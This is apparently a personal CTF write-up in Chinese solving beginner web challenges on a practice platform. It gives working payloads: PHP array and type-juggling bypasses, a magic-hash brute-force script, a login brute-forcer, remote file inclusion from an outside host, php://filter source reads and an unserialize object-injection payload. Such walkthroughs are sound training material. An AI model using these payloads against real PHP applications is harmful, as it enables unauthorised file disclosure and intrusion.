ctf入门级题目

<?php
$flag = '*********';

if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
        echo '<p class="alert">You password must be alphanumeric</p>';
    else if (strpos ($_GET['password'], '--') !== FALSE)
        die($flag);
    else
        echo '<p class="alert">Invalid password</p>';
}
?>

<section class="login">
        <div class="title">
                <a href="./index.phps">View Source</a>
        </div>

        <form method="POST">
                <input type="text" required name="password" placeholder="Password" /><br/>
                <input type="submit"/>
        </form>
</section>
</body>
</html>

利用ereg和strops处理数组的漏洞，提交?password[]=1

flag{Maybe_using_rexpexp_wasnt_a_clever_move}

曲奇饼

观察链接，file后面是一个base64，解码为key.txt并没有什么用。将index.phpbase64，然后不断修改line读取源码。

<?php
error_reporting(0); 
$file=base64_decode(isset($_GET['file'])?$_GET['file']:""); 
$line=isset($_GET['line'])?intval($_GET['line']):0; 
if($file=='') header("location:index.php?line=&file=a2V5LnR4dA=="); 
$file_list = array( 
'0' =>'key.txt', 
'1' =>'index.php', 
); 
if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){ 
$file_list[2]='thisis_flag.php'; 
} 
if(in_array($file, $file_list)){ 
$fa = file($file); 
echo $fa[$line]; 
} 
?>

view-source:http://ctf1.shiyanbar.com/shian-quqi/index.php?line=&file=dGhpc2lzX2ZsYWcucGhw

flag{UHGgd3rfH*(3HFhuiEIWF}

类型

 <?php
show_source(__FILE__);
$a=0;
$b=0;
$c=0;
$d=0;
if (isset($_GET['x1']))
{
        $x1 = $_GET['x1'];
        $x1=="1"?die("ha?"):NULL;
        switch ($x1)
        {
        case 0:
        case 1:
                $a=1;
                break;
        }
}
$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
    is_numeric(@$x2["x21"])?die("ha?"):NULL;
    if(@$x2["x21"]){
        ($x2["x21"]>2017)?$b=1:NULL;
    }
    if(is_array(@$x2["x22"])){
        if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
        $p = array_search("XIPU", $x2["x22"]);
        $p===false?die("ha?"):NULL;
        foreach($x2["x22"] as $key=>$val){
            $val==="XIPU"?die("ha?"):NULL;
        }
        $c=1;
}
}
$x3 = $_GET['x3'];
if ($x3 != '15562') {
    if (strstr($x3, 'XIPU')) {
        if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
            $d=1;
        }
    }
}
if($a && $b && $c && $d){
    include "flag.php";
    echo $flag;
}
?> 

最后：
x1=1a&x2={"x21":"2018a","x22":[[0],0]}&x3=XIPU18570

绕过x3的脚本

import hashlib

for i in xrange(1000000):
    s = 'XIPU' + str(i)
    mymd5 = hashlib.md5()
    mymd5.update(s)
    mymd5 = mymd5.hexdigest()
    flag = 1
    if mymd5[8:10] == '0e':
        for j in mymd5[10:24]:
            if j.isalpha():
                flag = 0
                break
        if flag == 1:
            print s
            break

CTF{Php_1s_bstl4_1a}

登录

源码提示:``，那就直接进行爆破好了

import requests
import re

s = requests.Session()


def get_rancode():
    response = s.get("http://ctf1.shiyanbar.com/shian-s/index.php")
    html = response.text
    regex = re.compile('\d\d\d')
    code = regex.findall(html)
    return code[0]

if __name__ == '__main__':
    for password in range(9999, 99999):
        code = get_rancode()
        url = "http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password={}&randcode={}".format(
            str(password), code)
        proxy={"http":"http://127.0.0.1:8080"}
        response = s.get(url)
        text = response.text

        if "flag" in text:
            print url
            break
        

脚本哪错了？没跑出来，不懂

admin

$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";

读取class.php:

http://ctf1.shiyanbar.com/shian-du/index.php?user=http://120.27.32.227/3.txt&file=php://filter/convert.base64-encode/resource=class.php&pass=1

<?php

class Read{//f1a9.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);    
        }
        return "__toString was called!";
    }
}

读取index.php:

<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    if(preg_match("/f1a9/",$file)){
        exit();
    }else{
        include($file); //class.php
        $pass = unserialize($pass);
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}

?>

<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
 

再通过序列化读取flag:

http://ctf1.shiyanbar.com/shian-du/index.php?user=http://120.27.32.227/3.txt&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=f1a9.php";}

哦豁。。第一个也可以用php://input 而不是远程包含绕过

flag_Xd{hSh_ctf:e@syt0g3t}

小记：emm....这种水平的比赛...确实对于某些水平来是浪费时间...感觉自己到了一个瓶颈，难的比赛又不会，一些比较简单的所获甚微。哎....还是要学啊